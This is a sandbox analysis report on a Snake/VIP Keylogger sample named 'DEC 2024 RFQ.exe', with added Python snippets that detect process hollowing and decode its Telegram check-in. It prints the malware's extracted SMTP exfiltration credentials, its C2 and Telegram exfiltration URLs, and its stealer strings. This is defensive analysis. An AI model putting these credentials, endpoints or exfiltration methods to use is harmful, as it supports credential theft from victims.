
Windows Analysis Report
DEC 2024 RFQ.exe

Overview

General Information

Sample name: DEC 2024 RFQ.exe
Analysis ID: 1572918
MD5: 34b4d7918dc670f64013e5d1f58a85cd
SHA1: dc5af092e9c5b2b38a2e72b03a2784fad36f20e6
SHA256: 3a0034689c3ef94d1e243b02eeca73fa564da13b1f09509d9cc290240ccc2b17
Tags: exe, user-threatcat_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DEC 2024 RFQ.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\DEC 2024 RFQ.exe" MD5: 34B4D7918DC670F64013E5D1F58A85CD)
    • RegSvcs.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\DEC 2024 RFQ.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
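The process tree shows RegSvcs.exe (PID 7508) running with the command line of the submitted sample. Together with the "Creates a process in suspended mode", "Writes to foreign memory regions" and "Maps a DLL or memory area into another process" signatures above, that is the footprint of process hollowing into a signed .NET utility: the parent creates RegSvcs.exe suspended, overwrites its image with the unpacked payload, and the recorded command line stays whatever the parent supplied. The check below is an added example and not part of the Joe Sandbox report. It flags process-creation events whose on-disk image does not match the program named in their own command line. The event layout is an assumed, simplified Sysmon-style record; the third (benign) event is constructed as a control.

```python
"""Image / command-line mismatch check for process-creation telemetry.

Added example, not part of the Joe Sandbox report. PIDs, paths and command
lines of the first two events are taken from the report's process tree; the
record layout is a simplified Sysmon Event ID 1 shape (assumed).
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessCreate:
    pid: int
    image: str          # executable actually mapped on disk
    command_line: str   # command line recorded at creation time


def first_token(command_line: str) -> str:
    """Return the program part of a Windows command line.

    Handles the quoted form ("C:\\dir with spaces\\x.exe" args) and the
    unquoted form (C:\\dir\\x.exe args).
    """
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def is_hollowing_candidate(ev: ProcessCreate) -> bool:
    """True when the file name on disk and the one in the command line differ."""
    claimed = ntpath.basename(first_token(ev.command_line)).lower()
    actual = ntpath.basename(ev.image).lower()
    return claimed != actual


def find_hollowing(events):
    """Return the events worth a closer look, in input order."""
    return [ev for ev in events if is_hollowing_candidate(ev)]


# Constructed events. The first two mirror the report's process tree.
SAMPLE = r"C:\Users\user\Desktop\DEC 2024 RFQ.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
EVENTS = [
    ProcessCreate(7492, SAMPLE, f'"{SAMPLE}"'),
    ProcessCreate(7508, REGSVCS, f'"{SAMPLE}"'),
    # benign control (constructed): RegSvcs launched under its own name
    ProcessCreate(7600, REGSVCS, f'"{REGSVCS}" /quiet some.dll'),
]

if __name__ == "__main__":
    for ev in find_hollowing(EVENTS):
        print(f"PID {ev.pid}: image {ev.image!r} but command line names "
              f"{first_token(ev.command_line)!r}")
```

Treat a hit as a hunting lead rather than a verdict: a parent that passes lpApplicationName to CreateProcess can legitimately produce a mismatch, because the command line is free text. Corroborate with the suspended-create and cross-process write telemetry that the signatures above describe.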
Malware family reference (Malpedia)
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Yara matches in memory dumps (16 entries in total; the remaining entries are collapsed in the source report)
Source | Rule | Description | Author
00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x2daa0:$a1: get_encryptedPassword
  • 0x2e028:$a2: get_encryptedUsername
  • 0x2d713:$a3: get_timePasswordChanged
  • 0x2d82a:$a4: get_passwordField
  • 0x2dab6:$a5: set_encryptedPassword
  • 0x307d2:$a6: get_passwords
  • 0x30b66:$a7: get_logins
  • 0x307be:$a8: GetOutlookPasswords
  • 0x30177:$a9: StartKeylogger
  • 0x30abf:$a10: KeyLoggerEventArgs
  • 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Yara matches in unpacked PE files (15 entries in total; the remaining entries are collapsed in the source report)
Source | Rule | Description | Author
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
1.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  Strings:
  • 0x2dca0:$a1: get_encryptedPassword
  • 0x2e228:$a2: get_encryptedUsername
  • 0x2d913:$a3: get_timePasswordChanged
  • 0x2da2a:$a4: get_passwordField
  • 0x2dcb6:$a5: set_encryptedPassword
  • 0x309d2:$a6: get_passwords
  • 0x30d66:$a7: get_logins
  • 0x309be:$a8: GetOutlookPasswords
  • 0x30377:$a9: StartKeylogger
  • 0x30cbf:$a10: KeyLoggerEventArgs
  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  No Sigma rule has matched
Suricata IDS alerts, SID 2803305 (severity 3)
Timestamp                        | SID     | Sev | Classtype       | Src IP      | Src Port | Dst IP        | Dst Port | Proto
2024-12-11T08:59:07.568512+0100  | 2803305 | 3   | Unknown Traffic | 192.168.2.4 | 49732    | 104.21.67.152 | 443      | TCP
2024-12-11T08:59:10.654855+0100  | 2803305 | 3   | Unknown Traffic | 192.168.2.4 | 49734    | 104.21.67.152 | 443      | TCP
2024-12-11T08:59:16.914491+0100  | 2803305 | 3   | Unknown Traffic | 192.168.2.4 | 49738    | 104.21.67.152 | 443      | TCP
2024-12-11T08:59:20.091991+0100  | 2803305 | 3   | Unknown Traffic | 192.168.2.4 | 49742    | 104.21.67.152 | 443      | TCP
2024-12-11T08:59:23.246084+0100  | 2803305 | 3   | Unknown Traffic | 192.168.2.4 | 49746    | 104.21.67.152 | 443      | TCP
2024-12-11T08:59:26.366616+0100  | 2803305 | 3   | Unknown Traffic | 192.168.2.4 | 49750    | 104.21.67.152 | 443      | TCP

Suricata IDS alerts, SID 2803274 (severity 2)
Timestamp                        | SID     | Sev | Classtype               | Src IP      | Src Port | Dst IP         | Dst Port | Proto
2024-12-11T08:59:03.225723+0100  | 2803274 | 2   | Potentially Bad Traffic | 192.168.2.4 | 49730    | 132.226.247.73 | 80       | TCP
2024-12-11T08:59:05.960090+0100  | 2803274 | 2   | Potentially Bad Traffic | 192.168.2.4 | 49730    | 132.226.247.73 | 80       | TCP
2024-12-11T08:59:09.039176+0100  | 2803274 | 2   | Potentially Bad Traffic | 192.168.2.4 | 49733    | 132.226.247.73 | 80       | TCP

AV Detection

Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: DEC 2024 RFQ.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DEC 2024 RFQ.exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: DEC 2024 RFQ.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0008445A
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008C6D1 FindFirstFileW,FindClose,0_2_0008C6D1
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0008C75C
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008EF95
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008F0F2
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008F3F3
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000837EF
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00083B12
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00E9F8E9h | 1_2_00E9F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 00E9FD41h | 1_2_00E9FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 065831E0h | 1_2_06582DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06580D0Dh | 1_2_06580B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06581697h | 1_2_06580B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 06582C19h | 1_2_06582968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658E0A9h | 1_2_0658DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658E959h | 1_2_0658E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658F209h | 1_2_0658EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658CF49h | 1_2_0658CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658D7F9h | 1_2_0658D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 065831E0h | 1_2_06582DBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658E501h | 1_2_0658E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658EDB1h | 1_2_0658EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658F661h | 1_2_0658F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 1_2_06580040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658FAB9h | 1_2_0658F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658D3A1h | 1_2_0658D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 065831E0h | 1_2_0658310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0658DC51h | 1_2_0658D9A8

                  Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected (9 requests observed, 3 of them carrying "Connection: Keep-Alive"): GET /xml/8.46.123.175 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
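The sendMessage request above is the keylogger's Telegram check-in. Note that the bot token between /bot and /sendMessage and the chat_id parameter are both empty, so the Telegram channel is not configured in this build (the extracted configuration names SMTP as the exfil mode), and the only HTTP response captured in this report is a 404 from nginx with a 55-byte JSON body, consistent with Telegram's {"ok":false,"error_code":404,"description":"Not Found"} answer to an unknown bot path. The code below is an added example and not part of the Joe Sandbox report. It parses the three request lines the sandbox observed (copied from the report; the tuple layout around them is constructed), recognises the checkip -> geoip -> telegram chain, decodes the percent-encoded text parameter into its fields, and flags a check-in that cannot succeed because token or chat_id is missing.

```python
"""Decode a Snake/VIP Keylogger Telegram check-in and spot the beacon chain.

Added example, not part of the Joe Sandbox report. The request paths and
Host values below are those captured in the report; everything else
(the tuple layout, the helper names) is this example's own construction.
"""
import re
from urllib.parse import parse_qs, urlsplit

# (method, path, Host) as captured in the report.
REQUESTS = [
    ("GET", "/", "checkip.dyndns.org"),
    ("GET", "/xml/8.46.123.175", "reallyfreegeoip.org"),
    ("GET",
     "/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0A"
     "Date%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0A"
     "Country%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File"
     "%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D",
     "api.telegram.org"),
]

# Bot API paths look like /bot<token>/<method>; the token may be empty.
TELEGRAM_BOT_RE = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>[A-Za-z]+)")

# Order in which the sample resolves its public IP, geolocates it, then reports.
BEACON_CHAIN = ("checkip.dyndns.org", "reallyfreegeoip.org", "api.telegram.org")


def parse_telegram_checkin(path: str) -> dict:
    """Split a Bot API request into token, method, chat_id and decoded fields."""
    parts = urlsplit(path)
    m = TELEGRAM_BOT_RE.match(parts.path)
    if not m:
        raise ValueError("not a Telegram Bot API path")
    # keep_blank_values keeps chat_id= so an empty value is visible, not dropped.
    qs = parse_qs(parts.query, keep_blank_values=True)
    text = qs.get("text", [""])[0]          # parse_qs already percent-decodes
    fields, notes = {}, []
    for line in text.split("\r\n"):
        line = line.strip()
        if not line:
            continue
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
        else:
            notes.append(line)
    return {
        "token": m.group("token"),
        "method": m.group("method"),
        "chat_id": qs.get("chat_id", [""])[0],
        "fields": fields,
        "notes": notes,
    }


def telegram_exfil_would_fail(checkin: dict) -> bool:
    """A check-in with no bot token or no chat_id cannot be delivered."""
    return not checkin["token"] or not checkin["chat_id"]


def beacon_chain(requests) -> list:
    """Return the chain hosts seen in the traffic, in the order the sample uses them."""
    hosts = {host.lower() for _, _, host in requests}
    return [h for h in BEACON_CHAIN if h in hosts]


if __name__ == "__main__":
    print("chain seen:", beacon_chain(REQUESTS))
    parsed = parse_telegram_checkin(REQUESTS[2][1])
    for k, v in parsed["fields"].items():
        print(f"{k}: {v}")
    print("undeliverable:", telegram_exfil_would_fail(parsed))
```

Decoded, the message carries the victim host name (921702), a timestamp and the country resolved from the public IP 8.46.123.175, which is the sandbox's egress address. For hunting, the chain function is the useful part: the same three hosts, in that order, from a process that is not a browser is a strong Snake/VIP Keylogger indicator even when the Telegram request itself is encrypted.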
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.67.152
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4 -> 104.21.67.152:443 (six alerts, source ports 49732, 49734, 49738, 49742, 49746, 49750)
Source: global traffic | HTTP traffic detected (10 requests observed, 7 of them carrying "Connection: Keep-Alive"): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: C:\Users\user\Desktop\DEC 2024 RFQ.exe | Code function: 0_2_000922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_000922EE
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 11 Dec 2024 07:59:31 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp
String found in binary or memory: http://aborters.duckdns.org:8081 | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://anotherarmy.dns.army:8081 | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://checkip.dyndns.org | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://checkip.dyndns.org/ | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://checkip.dyndns.org/q | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: http://varders.kozow.com:8081 | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://api.telegram.org | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://api.telegram.org/bot | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://chrome.google.com/webstore?hl=en | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://reallyfreegeoip.org | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://reallyfreegeoip.org/xml/ | Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175 | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175$ | Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Source: RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmp
